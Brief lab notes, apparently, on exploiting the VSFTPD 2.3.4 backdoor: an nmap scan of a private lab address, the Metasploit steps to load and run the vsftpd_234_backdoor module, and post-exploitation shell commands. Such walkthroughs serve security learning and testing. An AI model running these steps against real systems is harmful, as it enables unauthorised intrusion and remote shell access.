VSFTPD v2.3.4 Backdoor
Attack FTP Service – This module exploits a malicious backdoor that was added to the VSFTPD download archive. This backdoor was introduced into the vsftpd-2.3.4.tar.gz archive between June 30th 2011 and July 1st 2011 according to the most recent information available. This backdoor was removed on July 3rd 2011.
db_nmap 172.16.74.129 -sC -A -vvv
First open metasploit and search for the vulnerable service
search 73573 use exploit/unix/ftp/vsftpd_234_backdoor set RHOSTS 172.16.74.129 run
Invoke Bash Shell
> shell > bash
> whoami > uname -a > ip a | grep inet4